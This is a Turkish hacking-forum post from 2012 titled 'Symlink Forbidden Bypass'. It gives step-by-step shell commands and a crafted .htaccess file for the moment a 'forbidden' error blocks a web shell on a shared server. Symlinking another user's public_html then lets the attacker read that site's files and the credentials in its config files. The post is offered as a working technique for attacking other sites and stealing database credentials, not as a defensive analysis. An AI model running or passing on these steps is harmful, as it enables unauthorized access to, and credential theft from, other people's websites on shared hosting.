Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





Symlink Forbidden Bypass

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 03-07-2012 15:21   #1
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
06/2012
Nereden
Balıkesir -- Erdek
Yaş
26
Mesajlar
Konular

Teşekkür (Etti): 11
Teşekkür (Aldı): 238


Symlink Forbidden Bypass



Merhaba.

Gün gelmediki ln -s ile çektiğimiz configler bize forbidden vermedi.. Başımıza dert olan bizi zorlayan durumlardan biridir. Bazen eval kodları bile işe yaramaz. Öyle durumlarda kullanılabilecek bi yol

safe mode on ise işe yarar.

komut satırına :

Kod:
mkdir cihan6776
sonra shellden /cihan6776 yazıyosunuz ve cihan6776 dizinine giriyosunuz.


[code]
touch .htaccess
[code]

diyosunuz ve boş bi .htaccess dosyası açıyosunuz. sonra edit yaparak içine
Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
kaydediyosunuz. sonra bu dizindeyken

Kod:
ln -s /home/kullanıcıadı/public_html 1.txt
yapıyosunuz ve shellyolu/cihan6776/1.txt dediğinizde sitenin tüm dosyalarını karşınızda görüyosunuz. sonrada ordan config dosyasına tıklıyosunuz ve bilgiler karşınızda

kolay gelsin


 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau